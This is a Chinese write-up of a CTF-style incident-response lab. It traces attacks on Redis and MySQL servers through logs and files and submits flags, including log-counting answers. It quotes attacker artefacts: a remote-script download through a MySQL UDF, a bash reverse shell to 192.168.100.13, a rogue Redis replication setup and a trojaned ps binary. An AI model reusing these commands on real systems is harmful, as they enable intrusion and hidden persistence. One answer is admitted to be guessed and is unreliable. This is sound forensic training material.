玄机应急响应第二章

redis应急响应

通过本地 PC SSH到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交;

查看/var/log/redis.log

找到

419:S 31 Jul 2023 05:34:33.173 * REPLICAOF 192.168.100.20:8888 enabled (user request from ‘id=6 addr=192.168.200.2:64339 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=48 qbuf-free=32720 obl=0 oll=0 omem=0 events=r cmd=slaveof’)

flag{192.168.100.20}

通过本地 PC SSH到服务器并且分析黑客第一次上传的恶意文件,将黑客上传的恶意文件里面的 FLAG 提交;

发现存在一行

419:S 31 Jul 2023 05:34:37.205 * Module ‘system’ loaded from ./exp.so

并在根目录找到这个exp.so

root@ip-10-0-10-3:~# strings /exp.so |grep "flag"
flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b}

通过本地 PC SSH到服务器并且分析黑客反弹 shell 的IP 为多少,将反弹 shell 的IP 作为 FLAG 提交;

按理来说应该是crontab -l 看出来的，但是环境有些问题，答案事猜出来的()

flag{192.168.100.13}

通过本地 PC SSH到服务器并且溯源分析黑客的用户名，并且找到黑客使用的工具里的关键字符串(flag{黑客的用户-关键字符串} 注关键字符串 xxx-xxx-xxx)。将用户名和关键字符串作为 FLAG提交

root@ip-10-0-10-1:~# cat /root/.ssh/authorized_keys 
REDIS0009	redis-ver5.0.1
redis-bits󿿀򳨭etOused-memXU
𮤭preamble~𷷳shB9

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDDh4OEFvyb4ubM7YPvzG/FfO6jE4PjLdmuCUdGP+aeLeJB5SXYT6zHkU9wlfY/Fo4UuBlhTqBaS6Ih/Wf62KepzrMsTQQYcSG/Xp8lgFzVCCFAk7apzxfRCPNk1pxaGiEF6MPoCmUu1UhC3ta3xyh2c4KZls0hyFN9JZsuD+siT8KVqm856vQ+RaTrZi3ThMa5gbeH+v3ZUcO35ZfMKor/uWXffHT0Yi06dsgIMN3faIiBrd1Lg0B5kOTaDq3fHs8Qs7pvR9C4ZTm2AK/Oct8ULdsnfS2YWtrYyC8rzNip9Wf083ZY1B4bj1UoxD+QwgThh5VP3xgRd9KDSzEYIBabstGh8GU5zDxr0zIuhQM35I0aALvojXl4QaaEnZwpqU3ZkojPG2aNC0QdiBK7eKwA38Gk+V8DEWc/TTkO+wm3aXYdll5sPmoWTAonaln1nmCiTDn4jKb73DxYHfSgNIDpJ6fS5kbWL5UJnElWCrxzaXKHUlqXJj3x81Oz6baFNv8= xj-test-user

这里考察溯源,找到他的github账号

https://github.com/xj-test-user/redis-rogue-getshell

在三次历史commit中找到

https://github.com/xj-test-user/redis-rogue-getshell/commit/76b1b74b92f9cc6ef2a62985debdf09dcc056636

flag{xj-test-user-wow-you-find-flag}

通过本地 PC SSH到服务器并且分析黑客篡改的命令,将黑客篡改的命令里面的关键字符串作为 FLAG 提交;

root@ip-10-0-10-1:~# cat /usr/bin/ps
#/bin/bash
oldifs="$IFS"
IFS='\$n'
result=$(ps_ $1 $2 $3|grep -v 'threadd' )
for v in $result;
do
        echo -e "$v\t";
done
IFS="$oldifs"
#//c195i2923381905517d818e313792d19

flag{c195i2923381905517d818e313792d196}

mysql应急响应

1.黑客第一次写入的shell flag{关键字符串}

依旧先下载web目录,使用D盾,找到webshell是sh.php

flag{ccfda79e-7aa1-4275-bc26-a6189eb9a20b}

2.黑客反弹shell的ip flag{ip}

找到一个远程下载sh脚本

HTTP/1.1" 200 3875 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27wget%20-o%20%2Ftmp%2F1.sh%20192.168.100.13%3A771%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"

root@xuanji:~# cat /tmp/1.sh
bash -i >&/dev/tcp/192.168.100.13/777 0>&1

flag{192.168.100.13}

3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx

mysql提权一般使用udf

root@xuanji:~# cat /var/log/apache2/access.log |grep ".so"
192.168.200.2 - - [01/Aug/2023:02:12:54 +0000] "POST /adminer.php?username=root&sql=create%20function%20sys_eval%20returns%20string%20soname%20%27mysqludf.so%27%3B HTTP/1.1" 200 3324 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20*%20from%20func%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.200.2 - - [01/Aug/2023:02:13:00 +0000] "POST /adminer.php?username=root&sql=select%20sys_eval(%27whoami%27)%3B HTTP/1.1" 200 3740 "http://192.168.200.31:8005/adminer.php?username=root&sql=create%20function%20sys_eval%20returns%20string%20soname%20%27mysqludf.so%27%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"

root@xuanji:~# find / -name mysqludf.so 2>/dev/null
/usr/lib/mysql/plugin/mysqludf.so

结果发现答案竟然不是

root@xuanji:~# ls -liah /usr/lib/mysql/plugin/
total 4.7M
33811536 drwxr-xr-x. 1 mysql mysql   39 Aug  1  2023 .
25401542 drwxr-xr-x. 1 root  root    20 Jul 31  2023 ..
43783787 -rw-r--r--. 1 mysql mysql  11K May 16  2019 auth_pam.so
43783788 -rw-r--r--. 1 mysql mysql 6.4K May 16  2019 auth_socket.so
43783789 -rw-r--r--. 1 mysql mysql  10K May 16  2019 dialog.so
43783790 -rw-r--r--. 1 mysql mysql 1.6M May 16  2019 ha_innodb.so
43783791 -rw-r--r--. 1 mysql mysql 156K May 16  2019 handlersocket.so
43783792 -rw-r--r--. 1 mysql mysql 6.0K May 16  2019 mysql_clear_password.so
33811537 -rw-rw-rw-. 1 mysql mysql  11K Aug  1  2023 mysqludf.so
43783793 -rw-r--r--. 1 mysql mysql  40K May 16  2019 semisync_master.so
43783794 -rw-r--r--. 1 mysql mysql  15K May 16  2019 semisync_slave.so
43783795 -rw-r--r--. 1 mysql mysql  55K May 16  2019 server_audit.so
43783796 -rw-r--r--. 1 mysql mysql 2.8M May 16  2019 sphinx.so
43783797 -rw-r--r--. 1 mysql mysql  11K May 16  2019 sql_errlog.so
33811538 -rw-rw-rw-. 1 mysql mysql   34 Aug  1  2023 udf.so

是/usr/lib/mysql/plugin/udf.so,是一个一句话木马

flag{b1818bde4e310f3d23f1005185b973e7}

4.黑客获取的权限 flag{whoami后的值}

ps aux发现mysql运行的用户身份是mysql

flag{mysql}

apache日志分析

1、提交当天访问次数最多的IP，即黑客IP：

root@ip-10-0-10-3:~# cat /var/log/apache2/access.log.1 |awk '{print $1}' |sort|uniq -c
      1 
     29 ::1
   6555 192.168.200.2
      1 192.168.200.211
      5 192.168.200.38
      1 192.168.200.48

flag{192.168.200.2}

2、黑客使用的浏览器指纹是什么，提交指纹的md5：

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

flag{2d6330f380f44ac20f3a02eed0958f66}

3、查看index.php页面被访问的次数，提交次数：

root@ip-10-0-10-3:~# cat /var/log/apache2/access.log.1 |grep "/index.php" |wc -l
27

flag{27}

4、查看黑客IP访问了多少次，提交次数：

flag{6555}

5、查看2023年8月03日8时这一个小时内有多少IP访问，提交次数:

::1表示本地IPv6的主机IP

root@ip-10-0-10-3:~# cat /var/log/apache2/access.log.1 |grep "03/Aug/2023:08" |awk '{print $1}' |sort|uniq -c
     29 ::1
   6555 192.168.200.2
      1 192.168.200.211
      5 192.168.200.38
      1 192.168.200.48

flag{5}